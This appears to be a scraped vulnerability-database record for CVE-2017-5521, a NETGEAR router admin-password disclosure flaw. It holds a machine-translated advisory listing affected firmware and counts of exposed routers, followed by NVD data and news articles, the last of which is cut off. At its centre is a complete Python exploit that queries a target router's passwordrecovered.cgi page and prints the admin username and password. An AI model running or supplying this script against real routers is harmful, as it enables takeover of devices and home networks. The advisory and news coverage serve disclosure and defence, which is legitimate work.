ID SSV:92639 Type seebug Reporter Modified 2017-02-03T00:00:00
Description
0x01 vulnerability overview
NETGEAR is a United States well-known router manufacturers, its products are used worldwide extensively. Recently, foreign security researcher Simon Kenin find NETGEAR router more series there is a password leak Vulnerability, CVE-2017-5521-in. When the router Password Recovery functionality is disabled to enable remote management when the vulnerability can be triggered.
0x02 vulnerability
Affected Router the presence of leaked password of the risk
0x03 impact version
Currently the vulnerability of the Publisher to verify the affected version:
AC1450 V1. 0. 0. 34_10. 0. 16 (Latest)
AC1450 V1. 0. 0. 22_1. 0. 10
AC1450 V1. 0. 0. 14_1. 0. 6
D6400 V1. 0. 0. 44_1. 0. 44 (V1. 0. 0. 52_1. 0. 52 and above not affected)
D6400 V1. 0. 0. 34_1. 3. 34
D6400 V1. 0. 0. 38_1. 1. 38
D6400 V1. 0. 0. 22_1. 0. 22
DC112A V1. 0. 0. 30_1. 0. 60 (Latest)
DGN2200v4 V1. 0. 0. 24_5. 0. 8 (V1. 0. 0. 66_1. 0. 66 is latest and is not affected)
JNDR3000 V1. 0. 0. 18_1. 0. 16 (Latest)
R6200 V1. 0. 1. 48_1. 0. 37 (V1. 0. 1. 52_1. 0. 41 and above are not affected)
R6200v2 V1. 0. 1. 20_1. 0. 18 (V1. 0. 3. 10_10. 1. 10 is latest and is not affected)
R6250 V1. 0. 1. 84_1. 0. 78 (V1. 0. 4. 2_10. 1. 10 is latest and is not affected)
R6300 V1. 0. 2. 78_1. 0. 58 (Latest)
R6300v2 V1. 0. 4. 2_10. 0. 74 (V1. 0. 4. 6_10. 0. 76 is latest and is patched)
R6300v2 V1. 0. 3. 30_10. 0. 73
R6700 V1. 0. 1. 14_10. 0. 29 (Latest beta)
R6700 V1. 0. 0. 26_10. 0. 26 (Latest stable)
R6700 V1. 0. 0. 24_10. 0. 18
R6900 V1. 0. 0. 4_1. 0. 10 (Latest)
R7000 V1. 0. 6. 28_1. 1. 83 (V1. 0. 7. 2_1. 1. 93 is latest and is patched)
R8300 V1. 0. 2. 48_1. 0. 52
R8500 V1. 0. 2. 30_1. 0. 43 (V1. 0. 2. 64_1. 0. 62 and above is patched)
R8500 V1. 0. 2. 26_1. 0. 41
R8500 V1. 0. 0. 56_1. 0. 28
R8500 V1. 0. 0. 20_1. 0. 11
VEGN2610 V1. 0. 0. 35_1. 0. 35 (Latest)
VEGN2610 V1. 0. 0. 29_1. 0. 29
VEGN2610 V1. 0. 0. 27_1. 0. 27
WNDR3400v2 V1. 0. 0. 16_1. 0. 34 (V1. 0. 0. 52_1. 0. 81 is latest and is not affected)
WNDR3400v3 V1. 0. 0. 22_1. 0. 29 (V1. 0. 1. 2_1. 0. 51 is latest and is not affected)
WNDR3700v3 V1. 0. 0. 38_1. 0. 31 (Latest)
WNDR4000 V1. 0. 2. 4_9. 1. 86 (Latest)
WNDR4500 V1. 0. 1. 40_1. 0. 68 (Latest)
WNDR4500v2 V1. 0. 0. 60_1. 0. 38 (Latest)
WNDR4500v2 V1. 0. 0. 42_1. 0. 25
WGR614v10 V1. 0. 2. 60_60. 0. 85 NA (Latest)
WGR614v10 V1. 0. 2. 58_60. 0. 84 NA
WGR614v10 V1. 0. 2. 54_60. 0. 82 NA
WN3100RP V1. 0. 0. 14_1. 0. 19 (Latest)
WN3100RP V1. 0. 0. 6_1. 0. 12
Lenovo R3220 V1. 0. 0. 16_1. 0. 16 (Latest)
Lenovo R3220 V1. 0. 0. 13_1. 0. 13
0x04 vulnerability verification
Access vulnerability the router the following url: ip:port/passwordrecovered. cgi?
0x05 vulnerability distribution
We 2017-02/03 using ZoomEye cyberspace search engine to search for Netgear got 2249273 results, found still affected router has 5065, home in 81 countries. Wherein the number of the top ten country distribution as shown below:
Port distribution aspect, in the router open port type a total of 32 species, of which the port number Top10 as shown below:
Then we on these router password classification after the statistics of the different passwords a total of 3156. The following table is the number of occurrences of the top ten passwords:
The table appears the most number of times the password is password ,this password is the NETGEAR router default password, that is those affected router has 744 using the default password,which the United States occupies 267, Kuwait occupies a 173.
#!/usr/bin/env python
# coding: utf-8
import sys
import requests
def scrape(text, start_trig, end_trig):
if text.find(start_trig) != -1:
return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
else:
return "i_dont_speak_english"
#disable nasty insecure ssl warning
requests.packages.urllib3.disable_warnings()
#1st stage
ip = sys.argv[1]
port = sys.argv[2]
url = 'http://' + ip + ':' + port + '/'
try:
r = requests.get(url)
except:
url = 'https://' + ip + ':' + port + '/'
r = requests.get(url, verify=False)
model = r.headers.get('WWW-Authenticate')
if model is not None:
print "Attacking: " + model[13:-1]
else:
print "not a netgear router"
sys.exit(0)
#2nd stage
url = url + 'passwordrecovered.cgi?id=get_rekt'
try:
r = requests.post(url, verify=False)
except:
print "not vulnerable router"
sys.exit(0)
#profit
if r.text.find('left\">') != -1:
username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))
username = scrape(username, '>', '\'')
password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))
password = scrape(password, '>', '\'')
if username == "i_dont_speak_english":
username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))
password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))
else:
print "not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again"
sys.exit(0)
#html encoding pops out of nowhere, lets replace that
password = password.replace("#","#")
password = password.replace("&","&")
print "user: " + username
print "pass: " + password
{"type": "seebug", "lastseen": "2017-11-19T12:02:10", "href": "https://www.seebug.org/vuldb/ssvid-92639", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "modified": "2017-02-03T00:00:00", "reporter": "", "description": "### 0x01 vulnerability overview\n\nNETGEAR is a United States well-known router manufacturers, its products are used worldwide extensively. Recently, foreign security researcher Simon Kenin find NETGEAR router more series there is a password leak Vulnerability, CVE-2017-5521-in. When the router Password Recovery functionality is disabled to enable remote management when the vulnerability can be triggered.\n\n### 0x02 vulnerability\n\nAffected Router the presence of leaked password of the risk\n\n### 0x03 impact version\n\nCurrently the vulnerability of the Publisher to verify the affected version:\n\n * AC1450 V1. 0. 0. 34_10. 0. 16 (Latest)\n * AC1450 V1. 0. 0. 22_1. 0. 10\n * AC1450 V1. 0. 0. 14_1. 0. 6\n * D6400 V1. 0. 0. 44_1. 0. 44 (V1. 0. 0. 52_1. 0. 52 and above not affected)\n * D6400 V1. 0. 0. 34_1. 3. 34\n * D6400 V1. 0. 0. 38_1. 1. 38\n * D6400 V1. 0. 0. 22_1. 0. 22\n * DC112A V1. 0. 0. 30_1. 0. 60 (Latest)\n * DGN2200v4 V1. 0. 0. 24_5. 0. 8 (V1. 0. 0. 66_1. 0. 66 is latest and is not affected)\n * JNDR3000 V1. 0. 0. 18_1. 0. 16 (Latest)\n * R6200 V1. 0. 1. 48_1. 0. 37 (V1. 0. 1. 52_1. 0. 41 and above are not affected)\n * R6200v2 V1. 0. 1. 20_1. 0. 18 (V1. 0. 3. 10_10. 1. 10 is latest and is not affected)\n * R6250 V1. 0. 1. 84_1. 0. 78 (V1. 0. 4. 2_10. 1. 10 is latest and is not affected)\n * R6300 V1. 0. 2. 78_1. 0. 58 (Latest)\n * R6300v2 V1. 0. 4. 2_10. 0. 74 (V1. 0. 4. 6_10. 0. 76 is latest and is patched)\n * R6300v2 V1. 0. 3. 30_10. 0. 73\n * R6700 V1. 0. 1. 14_10. 0. 29 (Latest beta)\n * R6700 V1. 0. 0. 26_10. 0. 26 (Latest stable)\n * R6700 V1. 0. 0. 24_10. 0. 18\n * R6900 V1. 0. 0. 4_1. 0. 10 (Latest)\n * R7000 V1. 0. 6. 28_1. 1. 83 (V1. 0. 7. 2_1. 1. 93 is latest and is patched)\n * R8300 V1. 0. 2. 48_1. 0. 52\n * R8500 V1. 0. 2. 30_1. 0. 43 (V1. 0. 2. 64_1. 0. 62 and above is patched)\n * R8500 V1. 0. 2. 26_1. 0. 41\n * R8500 V1. 0. 0. 56_1. 0. 28\n * R8500 V1. 0. 0. 20_1. 0. 11\n * VEGN2610 V1. 0. 0. 35_1. 0. 35 (Latest)\n * VEGN2610 V1. 0. 0. 29_1. 0. 29\n * VEGN2610 V1. 0. 0. 27_1. 0. 27\n * WNDR3400v2 V1. 0. 0. 16_1. 0. 34 (V1. 0. 0. 52_1. 0. 81 is latest and is not affected)\n * WNDR3400v3 V1. 0. 0. 22_1. 0. 29 (V1. 0. 1. 2_1. 0. 51 is latest and is not affected)\n * WNDR3700v3 V1. 0. 0. 38_1. 0. 31 (Latest)\n * WNDR4000 V1. 0. 2. 4_9. 1. 86 (Latest)\n * WNDR4500 V1. 0. 1. 40_1. 0. 68 (Latest)\n * WNDR4500v2 V1. 0. 0. 60_1. 0. 38 (Latest)\n * WNDR4500v2 V1. 0. 0. 42_1. 0. 25\n * WGR614v10 V1. 0. 2. 60_60. 0. 85 NA (Latest)\n * WGR614v10 V1. 0. 2. 58_60. 0. 84 NA\n * WGR614v10 V1. 0. 2. 54_60. 0. 82 NA\n * WN3100RP V1. 0. 0. 14_1. 0. 19 (Latest)\n * WN3100RP V1. 0. 0. 6_1. 0. 12\n * Lenovo R3220 V1. 0. 0. 16_1. 0. 16 (Latest)\n * Lenovo R3220 V1. 0. 0. 13_1. 0. 13\n\n### 0x04 vulnerability verification\n\nAccess vulnerability the router the following url: `ip:port/passwordrecovered. cgi?`\n\n\n\n### 0x05 vulnerability distribution\n\nWe 2017-02/03 using ZoomEye cyberspace search engine to search for Netgear got 2249273 results, found still affected router has 5065, home in 81 countries. Wherein the number of the top ten country distribution as shown below:\n\n\n\nPort distribution aspect, in the router open port type a total of 32 species, of which the port number Top10 as shown below:\n\n\n\nThen we on these router password classification after the statistics of the different passwords a total of 3156. The following table is the number of occurrences of the top ten passwords:\n\n\n\nThe table appears the most number of times the password is password ,this password is the NETGEAR router default password, that is those affected router has 744 using the default password,which the United States occupies 267, Kuwait occupies a 173.\n", "bulletinFamily": "exploit", "references": [], "viewCount": 23, "status": "cve,poc,details", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92639", "cvelist": ["CVE-2017-5521"], "enchantments_done": [], "title": "Netgear router password disclosure Vulnerability(CVE-2017-5521)", "id": "SSV:92639", "sourceData": "\n #!/usr/bin/env python\r\n# coding: utf-8\r\n\r\nimport sys\r\nimport requests\r\n\r\ndef scrape(text, start_trig, end_trig):\r\n if text.find(start_trig) != -1:\r\n return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]\r\n else:\r\n return \"i_dont_speak_english\"\r\n#disable nasty insecure ssl warning\r\nrequests.packages.urllib3.disable_warnings()\r\n#1st stage\r\nip = sys.argv[1]\r\nport = sys.argv[2]\r\nurl = 'http://' + ip + ':' + port + '/'\r\ntry:\r\n r = requests.get(url)\r\nexcept:\r\n url = 'https://' + ip + ':' + port + '/'\r\n r = requests.get(url, verify=False)\r\nmodel = r.headers.get('WWW-Authenticate')\r\nif model is not None:\r\n print \"Attacking: \" + model[13:-1]\r\nelse:\r\n print \"not a netgear router\"\r\n sys.exit(0)\r\n#2nd stage\r\nurl = url + 'passwordrecovered.cgi?id=get_rekt'\r\ntry:\r\n r = requests.post(url, verify=False)\r\nexcept:\r\n print \"not vulnerable router\"\r\n sys.exit(0)\r\n#profit\r\nif r.text.find('left\\\">') != -1:\r\n username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))\r\n username = scrape(username, '>', '\\'')\r\n password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))\r\n password = scrape(password, '>', '\\'')\r\n if username == \"i_dont_speak_english\":\r\n username = (scrape(r.text[r.text.find('left\\\">'):-1], 'left\\\">', '</td>'))\r\n password = (scrape(r.text[r.text.rfind('left\\\">'):-1], 'left\\\">', '</td>'))\r\nelse:\r\n print \"not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again\"\r\n sys.exit(0)\r\n#html encoding pops out of nowhere, lets replace that\r\npassword = password.replace(\"#\",\"#\")\r\npassword = password.replace(\"&\",\"&\")\r\nprint \"user: \" + username\r\nprint \"pass: \" + password\n ", "published": "2017-02-03T00:00:00", "enchantments": {"score": {"value": 5.6, "vector": "NONE", "modified": "2017-11-19T12:02:10", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-5521"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:140844"]}, {"type": "zdt", "idList": ["1337DAY-ID-26837"]}, {"type": "thn", "idList": ["THN:4EBD42C3757E080E11C736252B193432", "THN:F5020205F527B28821065409F4534D5B"]}, {"type": "threatpost", "idList": ["THREATPOST:8119266A33EA63A27EBA5260DFF8564D", "THREATPOST:D385B7F0C96E0B992FFCD6607B1E3A41"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:640BC8CE4CE32D930C91A9B475F51D37"]}, {"type": "exploitdb", "idList": ["EDB-ID:41205"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/NETGEAR_PASSWORD_DISCLOSURE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106536"]}], "modified": "2017-11-19T12:02:10", "rev": 2}, "vulnersScore": 5.6}, "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:36:47", "description": "An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server. The bug is exploitable remotely if the remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When trying to access the web panel, a user is asked to authenticate; if the authentication is canceled and password recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled), they will receive the admin password for the router. If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were previously set when enabling that feature. This is persistent (even after disabling the recovery option, the exploit will fail) because the router will ask for the security questions.", "edition": 4, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-17T09:59:00", "title": "CVE-2017-5521", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5521"], "modified": "2017-09-01T01:29:00", "cpe": ["cpe:/o:netgear:r6200_firmware:1.0.1.56_1.0.43", "cpe:/o:netgear:wndr4500_firmware:1.0.1.44_1.0.73", "cpe:/o:netgear:d6300b_firmware:1.0.0.40", "cpe:/o:netgear:ac1450_firmware:1.0.0.34_10.0.16", "cpe:/o:netgear:vegn2610_firmware:1.0.0.36", "cpe:/o:netgear:d6220_firmware:1.0.0.12", "cpe:/o:netgear:wnr1000v3_firmware:1.0.2.68_60.0.93", "cpe:/o:netgear:d6300_firmware:1.0.0.96", "cpe:/o:netgear:wndr4000_firmware:1.0.2.4_9.1.86", "cpe:/o:netgear:d6400_firmware:1.0.0.44", "cpe:/o:netgear:wndr3700v3_firmware:1.0.0.40_1.0.32", "cpe:/o:netgear:r6300_firmware:1.0.2.78_1.0.58", "cpe:/o:netgear:dgn2200bv4_firmware:1.0.0.68"], "id": "CVE-2017-5521", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5521", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:netgear:d6220_firmware:1.0.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:netgear:wndr4500_firmware:1.0.1.44_1.0.73:*:*:*:*:*:*:*", "cpe:2.3:o:netgear:d6300b_firmware:1.0.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:netgear:dgn2200bv4_firmware:1.0.0.68:*:*:*:*:*:*:*", "cpe:2.3:o:netgear:r6300_firmware:1.0.2.78_1.0.58:*:*:*:*:*:*:*", "cpe:2.3:o:netgear:wnr1000v3_firmware:1.0.2.68_60.0.93:*:*:*:*:*:*:*", "cpe:2.3:o:netgear:wndr4000_firmware:1.0.2.4_9.1.86:*:*:*:*:*:*:*", "cpe:2.3:o:netgear:ac1450_firmware:1.0.0.34_10.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:netgear:d6300_firmware:1.0.0.96:*:*:*:*:*:*:*", "cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:netgear:wndr3700v3_firmware:1.0.0.40_1.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:netgear:vegn2610_firmware:1.0.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:netgear:d6400_firmware:1.0.0.44:*:*:*:*:*:*:*"]}], "threatpost": [{"lastseen": "2018-10-06T22:54:09", "bulletinFamily": "info", "cvelist": ["CVE-2017-5521"], "description": "Hundreds of thousands\u2013potentially more than one million\u2013Netgear routers are susceptible to a pair of vulnerabilities that can lead to password disclosure.\n\nResearchers said that while anyone who has physical access to a router can exploit the vulnerabilities locally, the real threat is that the flaw can also be exploited remotely.\n\nAccording to Simon Kenin, a security researcher with Trustwave\u2019s Spiderlabs team, who discovered the flaw and disclosed it Monday, the vulnerabilities can be remotely exploited if the router\u2019s remote management option is enabled.\n\nWhile Netgear claims remote management is turned off on routers by default, Kenin said there are \u201chundreds of thousands, if not over a million\u201d devices left remotely accessible.\n\nKenin claims that all he had to do was send a simple request to the router\u2019s web management server to retrieve a router\u2019s password. After determining a number that corresponds to a password recovery token, he found he could pair it with a call to the router\u2019s passwordrecovered.cgi script. Kenin claims he made his discovery by leveraging two exploits disclosed in 2014 on some Netgear routers he had hanging around.\n\nIt wasn\u2019t until after Kenin pieced together a python script designed to diagnose the scope of the issue that he determined he could still retrieve the router\u2019s credentials even if he didn\u2019t send the correct password recovery token.\n\n\u201cAfter few trials and errors trying to reproduce the issue, I found that the very first call to passwordrecovered.cgi will give out the credentials no matter what the parameter you send. This is totally new bug that I haven\u2019t seen anywhere else. When I tested both bugs on different NETGEAR models, I found that my second bug works on a much wider range of models,\u201d Kenin wrote Monday.\n\nKenin\u2019s employer, Trustwave, divulged details around both vulnerabilities in a [lengthy blog post Monday](<https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/>), putting the wraps on a nearly year-long odyssey with the vendor.\n\nThe firm first disclosed the vulnerability to Netgear in April 2016, initially it listing 18 vulnerable models, before listing 25 vulnerable models in a subsequent advisory. After repeated requests for an update on a fix for the vulnerability, Netgear finally obliged in July and provided firmware updates for a fraction of the affected routers.\n\nIt wasn\u2019t until this weekend that Netgear acknowledged the issues again, posting an updated version of the [article on its support page](<http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability>), instructing users to find and download the appropriate firmware fixes. The most recent version of the advisory claims there are 31 vulnerable models, 18 of which are patched.\n\nThe company is encouraging users of some devices in which firmware is not available to implement a workaround. According to Netgear, users of 12 different models would be best served to manually enable password recovery and disable remote management on their devices.\n\n\u201cThe potential for password exposure remains if you do not complete both steps. NETGEAR is not responsible for any consequences that could have been avoided by following the recommendations in this notification,\u201d the company writes.\n\nIt\u2019s the first critical vulnerability to affect Netgear routers this year but the second in the last two months. [In December](<https://threatpost.com/netgear-routers-remain-exposed-to-critical-flaw/122421/>), it was discovered that a handful of the company\u2019s Nighthawk line of routers were vulnerable to a flaw that could have given an attacker root access on the device and allowed them to run remote code. The company was quick to [release beta firmware updates](<https://threatpost.com/beta-firmware-updates-available-for-vulnerable-netgear-routers/122457/>) to address the vulnerability but simultaneously confirmed that more routers than originally reported were vulnerable.\n\nWhen reached Wednesday, a Netgear spokesperson said it was aware of the vulnerability and that it was appreciative of the research Trustwave carried out.\n\n> \u201cNETGEAR does appreciate and value having security concerns brought to our attention. We constantly monitors for both known and unknown threats. Being pro-active rather than re-active to emerging security issues is fundamental for product support at NETGEAR. It is NETGEAR\u2019s mission to be the innovative leader in connecting the world to the internet. To achieve this mission, we strive to earn and maintain the trust of those that use NETGEAR products for their connectivity.\u201d\n\nThe router manufacturer is using the most recent incident to tout its fairly new bug bounty program. [Netgear partnered with Bugcrowd](<https://bugcrowd.com/netgear>) at the beginning of the year and said it will dole out between $150 and $15,000 per bug.\n\nKenin and Trustwave learned of the company\u2019s new bug bounty plan just prior to publishing their findings back in December, something that helped assuage any fears of the bugs not getting patched.\n\n\u201cWe fully expect this move will not only smooth the relationship between third-party researchers and NETGEAR, but, in the end, will result in a more secure line of products and services.\u201d\n\nKenin points out that in the wake of Mirai, having the admin password for a router can cause a lot of damage. In addition to giving an attacker access to the network, it allows them to cherry pick any devices that may using the same admin password connected to it.\n\n\u201cAs many people reuse their password, having the admin password of the router gives us an initial foothold on the network. We can see all the devices connected to the network and try to access them with that same admin password,\u201d Kenin wrote Monday.\n\n\u201cWith malware such as the Mirai botnet being out there, it is also possible that some of the vulnerable routers could be infected and ultimately used as bots as well. If running a bot is not possible, the DNS can be easily changed to a rogue one, as described by Proofpoint, to further infect machines on the network,\u201d he added.\n\nKafeine, a researcher with Proofpoint, [warned last month](<https://threatpost.com/dnschanger-exploit-kit-hijacks-routers-not-browsers/122539/>) that attackers were using the DNSChanger exploit kit in man-in-the-middle attacks and to change the DNS records for routers.\n", "modified": "2017-02-01T21:10:15", "published": "2017-01-30T16:48:28", "id": "THREATPOST:D385B7F0C96E0B992FFCD6607B1E3A41", "href": "https://threatpost.com/hundreds-of-thousands-of-netgear-routers-vulnerable-to-password-bypass/123462/", "type": "threatpost", "title": "Hundreds of Thousands of Netgear Routers Vulnerable to Password Bypass", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-06T22:53:52", "bulletinFamily": "info", "cvelist": ["CVE-1999-0502", "CVE-2014-9222", "CVE-2016-1000245", "CVE-2016-1000246", "CVE-2016-6535", "CVE-2017-5521"], "description": "A variant of the Mirai malware pummeled a U.S. college last month with a marathon 54-hour long attack. Researchers say this latest Mirai variant is a more potent version of the notorious Mirai malware that made headlines in [October, targeting DNS provider Dyn](<https://threatpost.com/dyn-ddos-could-have-topped-1-tbps/121609/>) and the [Krebs on Security website](<https://threatpost.com/iot-botnets-are-the-new-normal-of-ddos-attacks/121093/>).\n\nThe IoT botnet behind the DDoS attacks is flooding its targets with HTTP traffic in application layer attacks, according to a [technical overview](<https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html>) by security firm Imperva posted on Wednesday.\n\nResearchers say attackers are leveraging 9,793 CCTV cameras, DVRs and routers, and are exploiting the same vulnerabilities as the original Mirai malware. \u201cWe are seeing the same attack patterns and the same vulnerabilities being exploited; right down to the telnet ports as with Mirai last year,\u201d said Dima Berkerman, security research specialist at Imperva in an interview with Threatpost.\n\nAccording to Berkerman the multi-day DDoS attack maintained a traffic flow of 30,000 requests per second, peaking at 37,000. \u201cThis is the most the most we\u2019ve seen out of any Mirai botnet,\u201d Berkerman said.\n\nThe Mirai malware, spotted in October, continuously scans the internet looking for connected devices such as routers, IP-connected cameras, DVRs and more. The malware exploits those devices that rely on default, weak, or hard-coded credentials, and forces them to join botnets used in DDoS attacks.\n\nAccording to Berkerman, who analyzed the attack against the unnamed U.S. college, the new variant is nearly identical to the original except for the fact it contains 30 user-agent alternatives compared to just five used by the previous version. \u201cThe larger the range of user agents, the more this version of Mirai is going to be able to circumvent mitigation efforts,\u201d he said.\n\nResearchers say of the 9,793 IPs worldwide controlled by attackers 18 percent are located in the U.S., 11 percent in Israel and another 11 percent in Taiwan.\n\n\u201cLooking at the bigger picture, this variant of Mirai might be a symptom of the increased application layer DDoS attack activity we saw in the second half of 2016,\u201d said Bekerman. \u201cThat said, with over 90 percent of all application layer assaults lasting under six hours, an attack of this duration stands in a league of its own.\u201d\n\nHe noted, while the original Mirai malware launched flood-based attacks at Layer 2 and 3, the most recent attacks were HTTP-based attacks at Layer 7.\n\nImperva said 56 percent of all IPs used in the February attack belonged to DVRs manufactured by one vendor. Berkerman declined to identify the DVR maker, but said that each of the infected devices were used in conjunction with CCTV cameras.\n\n\u201cWhile we don\u2019t know for sure, open telnet (23) ports and TR-069 (7547) ports on these devices might indicate that they were exploited by known vulnerabilities,\u201d Bekerman said.\n\nOne of the router vulnerabilities (CVE-2014-9222) being exploited by the latest version of the Mirai malware was identified in previous Mirai attacks as taking advantage of the router\u2019s TR-064 interface which is accessible via the internet-facing WAN port. That allows remote management with no authentication. The other router vulnerability (CVE-2017-5521) only required default credentials.\n\nFlaws found in the CCTV and DVR hardware allowed a default Linux telnet credential to be used. Mitre\u2019s Common Vulnerabilities and Exposures identifiers for those vulnerabilities incude; CVE-1999-0502, CVE-2016-6535, CVE-2016-1000245 and CVE-2016-1000246.\n\nImperva said each of these CVEs listed were also exploited by earlier versions of the Mirai malware.\n", "modified": "2017-03-30T18:50:51", "published": "2017-03-30T14:50:51", "id": "THREATPOST:8119266A33EA63A27EBA5260DFF8564D", "href": "https://threatpost.com/new-mirai-variant-carries-out-54-hour-ddos-attacks/124660/", "type": "threatpost", "title": "New Mirai Variant Roars into Action With 54 Hour DDoS Attacks", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T09:18:02", "bulletinFamily": "info", "cvelist": ["CVE-2017-5521"], "description": "[](<https://1.bp.blogspot.com/-HVBR5m5igEE/WJBRteGjDrI/AAAAAAAArQE/5mveFgmoCd4fs5FrewwSbvqVOPErgHzmgCLcB/s1600/Netgear-router-password-hacking.png>)\n\nAgain bad news for consumers with Netgear routers: Netgear routers hit by another serious security vulnerability, but this time more than two dozens router models are affected. \n \nSecurity researchers from Trustwave are warning of a new authentication vulnerability in at least 31 models of Netgear models that potentially affects over one million Netgear customers. \n \nThe new vulnerability, [discovered](<https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/>) by Trustwave's SpiderLabs researcher Simon Kenin, can allow remote hackers to obtain the admin password for the Netgear router through a flaw in the password recovery process. \n \nKenin discovered the flaw ([CVE-2017-5521](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5521>)) when he was trying to access the management page of his Netgear router but had forgotten its password. \n \n\n\n### Exploiting the Bug to Take Full Access on Affected Routers\n\n[](<https://4.bp.blogspot.com/-fx5cmNn4lDc/WJBTNV_8d_I/AAAAAAAArQQ/e0uEP9g6Ux4X5t_LZSxKdQ2tV_IBpR2OwCLcB/s1600/netgear.png>)\n\nSo, the researcher started looking for ways to hack his own router and found a couple of exploits from 2014 that he leveraged to discover this flaw which allowed him to query routers and retrieve their login credentials easily, giving him full access to the device. \n \nBut Kenin said the newly discovered flaw could be remotely exploited only if the router's remote management option is enabled. \n \nWhile the router vendor claims the remote management option is turned off on its routers by default, according to the researcher, there are \"hundreds of thousands, if not over a million\" routers left remotely accessible. \n\n\n> \"The vulnerability can be used by a remote attacker if remote administration is set to be internet facing. By default this is not turned on,\" Kenin said. \"However, anyone with physical access to a network with a vulnerable router can exploit it locally. This would include public Wi-Fi spaces like caf\u00e9s and libraries using the vulnerable equipment.\"\n\nIf exploited by bad actors, the vulnerability that completely bypasses any password on a Netgear router could give hackers complete control of the affected router, including the ability to change its configuration, turn it into botnets or even upload entirely new firmware. \n \nAfter trying out his flaw on a range of Netgear routers, Kenin was surprised to know that more than ten thousand vulnerable devices used the flawed firmware and can be accessed remotely. \n \nHe has also released an [exploit code](<https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911>) for testing purpose, written in Python. \n \n\n\n### List of Vulnerable NETGEAR Router Models\n\n \nThe SpiderLabs researcher stressed that the vulnerability is very serious as it affects a large number of Netgear router models. Here's a list of affected Netgear routers: \n\n\n * R8500\n * R8300\n * R7000\n * R6400\n * R7300DST\n * R7100LG\n * R6300v2\n * WNDR3400v3\n * WNR3500Lv2\n * R6250\n * R6700\n * R6900\n * R8000\n * R7900\n * WNDR4500v2\n * R6200v2\n * WNDR3400v2\n * D6220\n * D6400\n * C6300 (firmware released to ISPs)\n\n### Update the Firmware of your NETGEAR Router Now!\n\n \nKenin notified Netgear of the flaw, and the company confirmed the issue affects a large number of its products. \n \nNetgear has [released](<http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability>) firmware updates for all of its affected routers, and users are strongly advised to upgrade their devices. \n \nThis is the second time in around two months when researchers have discovered flaws in Netgear routers. Just last month, the US-CERT advised users to [stop using Netgear's R7000 and R6400](<https://thehackernews.com/2016/12/netgear-router-hacking.html>) routers due to a serious bug that permitted command injection. \n \nHowever, in an effort to make its product safe, Netgear recently partnered up with Bugcrowd to launch a [bug bounty program](<https://thehackernews.com/2017/01/netgear-router-bug-bounty.html>) that can 